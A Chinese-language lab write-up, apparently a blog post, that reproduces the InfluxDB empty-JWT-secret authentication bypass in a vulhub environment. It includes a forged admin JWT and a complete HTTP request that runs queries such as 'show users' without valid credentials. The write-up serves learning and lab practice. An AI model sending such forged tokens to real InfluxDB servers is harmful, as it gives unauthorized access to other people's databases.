InfluxDB 未授权访问漏洞复现
漏洞介绍
influxdb是一款著名的时序数据库,其使用jwt作为鉴权方式。在用户开启了认证,但未设置参数shared-secret的情况下,jwt的认证密钥为空字符串,此时攻击者可以伪造任意用户身份在influxdb中执行SQL语句。
影响版本
InfluxDB < 1.7.6
环境搭建
使用vulhub的漏洞环境
cd /vulhub/influxdb/unacc
docker-compose up -d
[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-cenIKidV-1632030339040)(https://i.loli.net/2021/09/19/S2J6wXjv3KWr75y.png)]
可以看到默认开启8086端口,访问到提示not found
漏洞复现
访问http://xxx:8086/debug/vars可查看系统服务信息:
进入到/query查询功能会弹出登陆窗口
我们借助https://jwt.io/来生成jwt token:
{
"alg": "HS256",
"typ": "JWT"
}
{
"username": "admin",
"exp": 1676346267
}
其中,admin
是一个已经存在的用户,exp
是一个时间戳,代表着这个token的过期时间,你需要设置为一个未来的时间戳。
抓包,发送带有这个jwt token的数据包,可见SQL语句执行成功:
POST /query HTTP/1.1
Host: your-ip
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6ImFkbWluIiwiZXhwIjoxNjc2MzQ2MjY3fQ.NPhb55F0tpsp5X5vcN_IkAAGDfNzV5BA6M4AThhxz6A
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 22
db=sample&q=show+users
参考:https://vulhub.org/#/environments/influxdb/unacc/
然后是vulhub的线上环境
查看数据库名:q=show databases ,数据库名:sample
再发送post数据:db=sample&&q=show users
用户名admin
后面不会了,没找到flag。。。